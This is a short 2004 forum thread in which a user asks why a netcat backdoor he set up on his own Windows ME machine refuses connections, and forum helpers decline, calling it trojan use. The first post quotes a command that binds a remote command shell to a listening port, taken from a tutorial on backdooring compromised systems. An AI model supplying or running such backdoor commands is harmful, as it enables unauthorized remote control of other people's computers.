Netcat

• Please log in to reply
3 replies to this topic

#1 Phaethon

Phaethon

• Pip
  • 2 posts

Posted 16 June 2004 - 08:33 AM

First of all, hi (this is my first post)

I read this "Netcat" tutorial about how to set backdoors on a compromised system, which says to make this batch file including:

nc -L -d -p [backdoor port of choice] -t -e command.com (I'm on windows ME)

I then realised that my computer didn't have the file nc.exe, so I downloaded it from a site (Is nc.exe a file that will work on every computer ?). I put both in the c:\windows directory, run the batch file (on port 22) and then tried this:

nc -v 127.0.0.1 22

which would normally connect to my own computer and open a command prompt in which I could type any command I wanted, but it said that the computer refused connection. Why? :techsupport:

Checking, however, what ports are open in my system (for example port 135) I tried this:

nc -v 127.0.0.1 135

It says that the port is open but when I start typing it won't "listen" to anything I type, whatever I do. I can't even exit it with any command. What should I do?

#2 Mike

Mike

Dark Lord of SWI

• Emeritus
  • PipPipPipPipPip
  • 514 posts

Posted 16 June 2004 - 08:59 AM

You're asking for help on how to use a trojan on an infected computer? Sorry, wrong place to ask for help with that. :rolleyes:
SpywareInfo: How are you gentlemen?? All your base are belong to us!!
Spyware: What you say!!
SpywareInfo: You have no chance to survive. Make your time!

#3 mitchshrader

mitchshrader

• Retired Staff - Helper
  • Pip
  • 29 posts

Posted 16 June 2004 - 09:05 AM

ROFLMAO! Are you EVER in the wrong place.. but.. my hearty congratulations on the clarity and precision of your query.

Please consider buying a white hat! We could sure use you on THIS side of the fence.

It has the benefit of information sharing, legality, and social approval. And it pays better, too.

Just a thought.. :whistle:
Helpers Rules (as I see 'em)
First, Do No Harm!
Second, Use Known Good (canned) Fixes when possible.
Third, Get Help From Others when not positive of your answer.
Fourth, Do Not Recommend complex procedures without verifying the skill of the user to accomplish necessary tasks.
Fifth, Specify optional removals as 'Users Choice'.
Sixth, Give Credit for info and assistance.
Last, BE POLITE. Especially when it is most difficult.

#4 Phaethon

Phaethon

• Pip
  • 2 posts

Posted 16 June 2004 - 12:06 PM

Hey, Netcat is neither a trojan nor anything illegal, it's a network scanning tool that can be used to set up back doors too (http://www.ifost.org...rse/node15.html). Plus, I didn't use it on any other computer than just mine. I was just wondering why it wouldn't open the port it was supposed to listen to, so as to be able to connect to my computer.

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

Member of ASAP and UNITE
Support SpywareInfo Forum - click the button